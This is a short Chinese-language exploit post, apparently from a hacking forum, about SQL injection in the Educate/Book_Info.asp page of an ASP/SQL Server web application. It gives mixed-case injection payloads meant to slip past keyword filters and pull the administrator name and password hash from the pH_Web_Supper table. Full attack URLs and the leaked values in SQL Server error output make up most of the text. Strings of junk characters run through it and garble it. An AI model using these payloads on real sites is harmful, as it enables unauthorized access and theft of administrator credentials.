漏洞出现在Educate/Book_Info.asp $ N! W+ E" ~; H! `! D3 a/ V
3 k/ I0 l6 R! p& K( }9 S
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出* r2 X; |: i) b f0 g! |
+ h# [/ q! o: G+ E4 G
exp:如下4 d \! }, V) \) X& m' R0 H
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
# q- G% n, D" r; Z: L( g- @' }查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)" U: d+ r% D* w- G/ e0 O w
& n' F% c9 w# L% d bhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
5 O7 R* n# a% m! n* C+ n6 p
3 ]6 o5 _/ e- W2 ~/ C! v# E' T/ V) [Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
1 \6 K( r) z1 k$ z( b) g# |+ k* Y
6 I; L( }6 X5 `: D# L A. p将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
4 J" {) \) L0 E! q( w" w( q
7 ~( y* z$ h5 K0 X& o( O0 }/Educate/Book_Info.asp,行 8
- f* b# K9 [7 d$ A q + p0 S0 V1 W% q1 D! M
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)( k2 `7 C; q8 u7 A
( i' n3 P' {8 W4 m
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
$ x+ N; v/ V9 c) [! R K( |7 P6 f2 m: b2 Y$ d
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。* @' z- W5 D0 u# c7 Q
8 N" \, ^, @1 i0 i, v
/Educate/Book_Info.asp,行 8! H( Q# f# b0 l* H) t
|